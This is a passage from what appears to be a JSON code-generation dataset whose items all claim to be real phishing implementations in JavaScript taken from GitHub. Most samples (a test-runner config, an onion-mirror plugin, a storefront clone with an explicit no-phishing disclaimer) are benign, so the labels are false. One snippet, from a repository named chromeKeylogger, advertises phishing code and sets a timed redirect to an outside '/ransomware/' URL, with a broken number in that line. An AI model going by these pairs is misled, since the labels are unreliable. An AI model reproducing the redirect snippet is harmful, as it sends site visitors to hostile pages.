\"h2,http\/1.1\", \"h2,http\/1.1\"]\r\nvar cleanIPs = []\r\n\r\nexport default {\r\n async fetch(request) {\r\n var url = new URL(request.url)\r\n var pathParts = url.pathname.replace(\/^\\\/|\\\/$\/g, \"\").split(\"\/\")\r\n var type = pathParts[0].toLowerCase()\r\n if ([\"sub\", \"clash\"].includes(type)) {\r\n if (pathParts[1] !== undefined) {\r\n var operator = pathParts[1].toUppe",
"language":"Javascript",
"repo_name":"NiREvil\/workers-cloudflare",
"timestamp":"2025-05-22T22:01:03.663874",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"\/* eslint-env node *\/\nmodule.exports = {\n test_page: 'tests\/index.html?hidepassed',\n disable_watching: true,\n launch_in_ci: [\n 'Chrome',\n ],\n launch_in_dev: [\n 'Chrome',\n ],\n browser_args: {\n Chrome: [\n '--headless',\n '--no-sandbox',\n '--disable-gpu',\n '--disable-software-rasterizer',\n '--mute-audio',\n '--remote-debugging-port=0',\n '--window-size=1440,900',\n\n \/\/ https:\/\/github.com\/GoogleChrome\/puppeteer\/blob\/v1.11.0\/lib\/Launcher.js#L36\n '--disable-background-networking',\n '--disable-background-timer-throttling',\n '--disable-backgrounding-occluded-windows',\n '--disable-breakpad',\n '--disable-client-side-phishing-detection',\n '--disable-default-apps',\n '--disable-dev-shm-usage',\n '--disable-extensions',\n '--disable-features=site-per-process',\n '--disable-hang-monitor',\n '--disable-ipc-flooding-protection',\n '--disable-popup-blocking',\n '--disable-prompt-on-repost',\n '--disable-renderer-backgrounding',\n '--disable-sync',\n '--disable-translate',\n '--enable-automation',\n '--metrics-recording-only',\n '--no-first-run',\n '--password-store=basic',\n '--safebrowsing-disable-auto-update',\n '--use-mock-keychain',\n ],\n },\n};\n",
"language":"Javascript",
"repo_name":"bitcoin-black-bcb\/bcb-wallet",
"timestamp":"2025-05-22T22:01:03.841591",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"\/\/'use strict';\n\nfunction appendMirr(data) {\n\tmirr = JSON.parse(data)[0];\n\tif(mirr.url) {\n\t\tvar altelem = document.createElement(\"h1\");\n\t\taltelem = '<br\/><a style=\"background: #2d2d2d !important; color:yellow !important; text-align: center !important; position: fixed !important; width: 100% !important; line-height: 1.5 !important; z-index: 9999 !important; display: block !important; visibility: visible !important; opacity: 1 !important;\" href=\"'+mirr.url+'\">Try this working mirror instead<\/a>';\n\t\tvar element = document.getElementById('mainwarn');\n\t\telement.innerHTML += altelem;\n\t}\n}\n\nfunction newMirr(site, success) {\n\tif(site) {\n\t\tgetAjax('https:\/\/onion.live\/api\/v2\/public\/mirrors?site='+site+'&max=1', '', success);\n\t}\n}\n\nfunction handleResponse(message) {\n\tconsole.log(`Message from the background script: ${message.response}`);\n}\n\nfunction handleError(error) {\n\tconsole.log(`Error: ${error}`);\n}\n\nfunction getAjax(url, data, success) {\n\tvar params = typeof data == 'string' ? data : Object.keys(data).map(\n\t\tfunction(k){ return encodeURIComponent(k) + '=' + encodeURIComponent(data[k]) }\n\t).join('&');\n\tvar xhr = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject(\"Microsoft.XMLHTTP\");\n\txhr.open('GET', url);\n\txhr.onreadystatechange = function() {\n\t\tif (xhr.readyState>3 && xhr.status==200) { success(xhr.responseText); }\n\t\tif (xhr.readyState>3 && xhr.status!==200) { success(xhr.responseText); }\n\t};\n\txhr.setRequestHeader('X-Requested-With', 'XMLHttpRequest');\n\txhr.setRequestHeader('Content-Type', 'application\/x-www-form-urlencoded');\n\txhr.send(params);\n\treturn xhr;\n}\n\nfunction checkWorking(url, site) {\n\tvar MrChecker = new XMLHttpRequest(),\n\tCheckThisUrl = \"http:\/\/\"+url+\"\/\";\n\tMrChecker.open('get', CheckThisUrl, true);\n\tMrChecker.onreadystatechange = checkReadyState;\n\tfunction checkReadyState() {\n\t\tif (MrChecker.readyState === 4) {\n\t\t\tif (MrChecker.status >= 200 || MrChecker.status < 304) {\n\t\t\t\tvar element = document.getElementById('mainwarn');\n\t\t\t\tif(element) {\n\t",
"language":"Javascript",
"repo_name":"OnionDotLive\/onionliveplugin",
"timestamp":"2025-05-22T22:01:04.017163",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"\/* \r\n####################################################################\r\n# s'abonner sur ma chaine youtube pour avoir plus de code phishing #\r\n# et hacking,il me donne le courage de faire les codes phishing # \r\n# #\r\n# subscribe on my youtube channel to have more phishing code #\r\n# and hacking, it gives me the courage to do the phishing codes #\r\n# #\r\n# ||~~ BY ~~ hakanonymos ~~|| #\r\n# #\r\n# #\r\n# #\r\n# skype et email : hakanonymos@hotmail.com # \r\n#################################################################### \r\n*\/\r\n\r\n \r\nvar xScroll, yScroll, timerPoll, timerRedirect, timerClock;\r\n \r\nfunction initRedirect(){\r\n if (typeof document.body.scrollTop != \"undefined\"){ \/\/IE,NS7,Moz\r\n xScroll = document.body.scrollLeft;\r\n yScroll = document.body.scrollTop;\r\n \r\n clearInterval(timerPoll); \/\/stop polling scroll move\r\n clearInterval(timerRedirect); \/\/stop timed redirect\r\n \r\n timerPoll = setInterval(\"pollActivity()\",1); \/\/poll scrolling votre site de redrection 10000 = 10 seconde\r\n timerRedirect = setInterval(\"location.href='https:\/\/panafricaine.com\/ransomware\/'\",300 0000); \/\/temps de redirection\r\n \r\n \r\n }\r\n else if (typeof window.pageYOffset != \"undefined\"){ \/\/other browsers that support pageYOffset\/pageXOffset instead\r\n ",
"language":"Javascript",
"repo_name":"hakanonymos\/chromeKeylogger",
"timestamp":"2025-05-22T22:01:04.152105",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"import { useEffect, useState } from \"react\";\n\nimport Navbar from \".\/components\/Navbar\/Navbar\";\nimport Breadcrumbs from \".\/components\/Breadcrumbs\/Breadcrumbs\";\nimport ProductDetails from \".\/components\/ProductDetails\/ProductDetails\";\nimport ProductCarousel from \".\/components\/ProductCarousel\/ProductCarousel\";\n\nimport Swal from \"sweetalert2\";\n\nimport \".\/App.css\";\n\nconst App = () => {\n\tconst [darkMode, setDarkMode] = useState(false);\n\n\tconst toggleDarkMode = () => setDarkMode(prevState => !prevState);\n\n\tuseEffect(() => {\n\t\tSwal.fire({\n\t\t\ttitle: \"\u00a1Atenci\u00f3n!\",\n\t\t\ttext: \"Esta web NO es el sitio oficial de Mercado Libre, se trata de un challenge de Frontend, no es un intento de phishing hacia los usuarios que la visitan.\",\n\t\t\ticon: \"warning\",\n\t\t\tconfirmButtonText: \"\u00a1Entendido!\",\n\t\t\tconfirmButtonColor: \"#3484fa\",\n\t\t\tbackdrop: \"rgba(0, 0, 0, 0.8)\",\n\t\t});\n\t}, []);\n\n\treturn (\n\t\t<>\n\t\t\t<header className={darkMode ? \"dark-mode\" : \"\"}>\n\t\t\t\t<Navbar darkMode={darkMode} toggleDarkMode={toggleDarkMode} \/>\n\t\t\t<\/header>\n\n\t\t\t<main className={darkMode ? \"dark-mode\" : \"\"}>\n\t\t\t\t<Breadcrumbs \/>\n\t\t\t\t<ProductDetails \/>\n\t\t\t\t<ProductCarousel \/>\n\t\t\t<\/main>\n\n\t\t\t<footer className={darkMode ? \"dark-mode\" : \"\"}>\n\t\t\t\tDesarrollado por \n\t\t\t\t<a\n\t\t\t\t\thref=\"https:\/\/gastonperez.ar\/\"\n\t\t\t\t\ttarget=\"_blank\"\n\t\t\t\t\trel=\"noreferrer\"\n\t\t\t\t>\n\t\t\t\t\tGastón Pérez\n\t\t\t\t<\/a>\n\t\t\t\t<p>\n\t\t\t\t\tATENCI\u00d3N: Esta web se trata de un \n\t\t\t\t\t<a\n\t\t\t\t\t\thref=\"https:\/\/github.com\/goncy\/mercadolibre-details-challenge\"\n\t\t\t\t\t\ttarget=\"_blank\"\n\t\t\t\t\t\trel=\"noreferrer\"\n\t\t\t\t\t>\n\t\t\t\t\t\tchallenge\n\t\t\t\t\t<\/a>\n\t\t\t\t\t, no es un intento de phishing hacia los usuarios que la\n\t\t\t\t\tvisitan.\n\t\t\t\t<\/p>\n\t\t\t<\/footer>\n\t\t<\/>\n\t);\n};\n\nexport default App;\n",
"language":"Javascript",
"repo_name":"GastonPerez97\/mercadolibre-details-challenge",
"timestamp":"2025-05-22T22:01:04.271013",
"split":"training"
}
] |